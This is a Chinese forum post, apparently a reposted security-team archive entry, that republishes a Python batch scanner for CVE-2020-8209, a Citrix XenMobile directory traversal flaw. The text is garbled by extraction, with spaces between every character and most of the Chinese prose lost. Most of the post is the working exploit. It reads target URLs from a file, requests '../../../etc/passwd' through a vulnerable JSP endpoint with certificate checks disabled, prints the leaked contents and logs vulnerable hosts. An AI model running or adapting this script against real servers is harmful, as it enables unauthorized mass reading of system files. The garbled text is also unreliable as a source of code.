搜索

[28673] 2020-12-07_CitrixXenMobile目录遍历扩展(CVE-2020-8209)批量检测脚本

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-19
2020-12-07_CitrixXenMobile目录遍历扩展(CVE-2020-8209)批量检测脚本 C i t r i x   X e n M o b i l e C V E - 2 0 2 0 - 8 2 0 9 B 1 a n d a 0   O t s   2 0 2 0 - 1 2 - 0 7 使 使 C i t r i x   X e n M o b i l e C V E - 2 0 2 0 - 8 2 0 9 使 P y t h o n   C V E - 2 0 2 0 - 8 2 0 9 - M u l t i p l e . p y   u r l . t x t v u l . t x t R P 2 C i t r i x   X e n M o b i l e 1 0 . 1 2 R P 4 C i t r i x   X e n M o b i l e 1 0 . 1 1 R P 6 C i t r i x   X e n M o b i l e 1 0 . 1 0 R P 5 C i t r i x   X e n M o b i l e 1 0 . 9 使 # ! / u s r / b i n / e n v   p y t h o n #   c o d i n g : u t f - 8 #   a u t h o r : B 1 a n d a 0 i m p o r t   r e q u e s t s , s y s , c o l o r a m a f r o m   c o l o r a m a   i m p o r t   * i n i t ( a u t o r e s e t = T r u e ) b a n n e r = ' ' ' 0 3 3 [ 1 ; 3 3 ; 4 0 m     _ _ _ _ _ _ _             _ _ _ _ _ _ _ _         _ _ _       _ _ _   _ _ _       _ _ _                   _ _ _   _ _ _       _ _ _       _ _ _       /   _ _ _ _           /   /     _ _ _ _ |     | _ _     /   _   _ _     /   _                 /   _   _ _     /   _     /   _     |   |                 /   / |   | _ _   _ _ _ _ _ _   )   |   |   |   |   )   |   |   |   | _ _ _ _ _ |   ( _ )   |   )   |   |   |   |   ( _ )   | |   |               /   /   |     _ _ | _ _ _ _ _ _ /   / |   |   |   | /   / |   |   |   | _ _ _ _ _ _ >   _   <   /   / |   |   |   | _ _ ,   | |   | _ _ _ _           /     |   | _ _ _ _         /   / _ |   | _ |   /   / _ |   | _ |   |           |   ( _ )   /   / _ |   | _ |   |     /   /     _ _ _ _ _ |       /       | _ _ _ _ _ _ |     | _ _ _ _ | _ _ _ / _ _ _ _ | _ _ _ /               _ _ _ / _ _ _ _ | _ _ _ /     / _ /                                                                                                                                                                                                                                                                                                                   ' ' ' d e f   X e n M o b i l e ( ) :     h e a d e r s   =   { " U s e r - A g e n t " :   " M o z i l l a / 5 . 0   ( W i n d o w s   N T   1 0 . 0 ;   W i n 6 4 ;   x 6 4 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 5 4 . 0 . 2 8 4 0 . 9 9   S a f a r i / 5 3 7 . 3 6 " }     p a y l o a d =   ' / j s p / h e l p - s b - d o w n l o a d . j s p ? s b F i l e N a m e = . . / . . / . . / e t c / p a s s w d '     p o c = u r l s + p a y l o a d     t r y :         r e q u e s t s . p a c k a g e s . u r l l i b 3 . d i s a b l e _ w a r n i n g s ( ) # I n s e c u r e R e q u e s t W a r n i n g         r e s p o n s e = r e q u e s t s . g e t ( p o c , h e a d e r s = h e a d e r s , t i m e o u t = 1 0 , v e r i f y = F a l s e )
        i f   r e s p o n s e . s t a t u s _ c o d e = = 2 0 0   a n d   " r o o t "   i n   r e s p o n s e . c o n t e n t :             p r i n t ( u ' 0 3 3 [ 1 ; 3 1 ; 4 0 m [ + ] { }   i s   c i t r i x   x e n m o b i l e   d i r e c t o r y   t r a v e r s a l   v u l n e r a b i l i t y ' . f o r m a t ( u r l s ) )             p r i n t ( r e s p o n s e . c o n t e n t )             # V u l . t x t             f = o p e n ( ' . / v u l . t x t ' , ' a ' )             f . w r i t e ( u r l s )             f . w r i t e ( ' n ' )         e l s e :             p r i n t ( ' 0 3 3 [ 1 ; 3 2 ; 4 0 m [ - ] { }   N o n e ' . f o r m a t ( u r l s ) )     e x c e p t :         p r i n t ( ' { }   r e q u e s t   t i m e o u t ' . f o r m a t ( u r l s ) ) i f   _ _ n a m e _ _   = =   ' _ _ m a i n _ _ ' :     p r i n t   ( b a n n e r )     i f   l e n ( s y s . a r g v ) ! = 2 :         p r i n t ( ' E x a m p l e : p y t h o n   C V E - 2 0 2 0 - 8 2 0 9 . p y   u r l . t x t ' )     e l s e :         f i l e   =   o p e n ( s y s . a r g v [ 1 ] )         f o r   u r l   i n   f i l e . r e a d l i n e s ( ) :             u r l s = u r l . s t r i p ( )             i f   u r l s [ - 1 ] = = ' / ' :                 u r l s = u r l s [ : - 1 ]             X e n M o b i l e ( )         p r i n t   ( ' C h e c k   O v e r ' ) h t t p s : / / g i t h u b . c o m / B 1 a n d a 0 / C V E - 2 0 2 0 - 8 2 0 9 / b l o b / m a i n / C V E - 2 0 2 0 - 8 2 0 9 - M u l t i p l e . p y
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理